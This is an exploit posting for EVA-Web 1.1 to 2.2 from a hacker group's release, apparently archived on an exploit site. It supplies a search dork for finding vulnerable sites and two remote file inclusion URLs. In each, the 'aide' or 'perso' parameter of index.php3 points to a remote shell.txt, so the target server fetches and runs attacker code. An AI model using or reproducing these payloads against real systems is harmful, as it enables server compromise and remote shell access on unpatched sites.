Home / os / solaris

evaweb-rfi.txt

Posted on 27 June 2007

############################################################################################### # ___ ___ _ # / _ / _ | | # __ _| | | | | | |_ __ ___ _ __ ___| |_ # / _` | | | | | | | '_ / __| | '_ / _ __| # | (_| | |_| | |_| | | | \__ \_| | | | __/ |_ # \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__| # __/ | # |___/ ############################################################################################### #Program Title ################################################################################ #EVA-Web 1.1<=2.2 Remote File Inclusion # #Note ####################################################################################### #A patch was released some time ago..but there was never an exploit released.. # #Script Download ############################################################################## #http://spip-edu.edres74.net # #d0rk ###################################################################################### #"et utilise le squelette EVA-Web" -3.0 -2.3 # #Spl0it ######################################################################################### #www.victim.com/[path to webapp]/eva/index.php3?aide=http://www.ursite.com/shell.txt? #www.victim.com/[path to webapp]/eva/index.php3?perso=http://www.ursite.com/shell.txt? # #vuln discovered by ############################################################################### #MurderSkillz # #shoutz: z3r0, milf, godxcel, clorox, katalyst, SyNiCaL, OD, pr0be, rezen, str0ke, #fish, rey, canuck, ,vipsta, c0ma, grumpy, err0r, sick, trintitty, asdfhacks.com , a59, freeillwill.com, fury, #<S>, Bernard, and everyone else at g00ns.net ###############################################################################################

 

TOP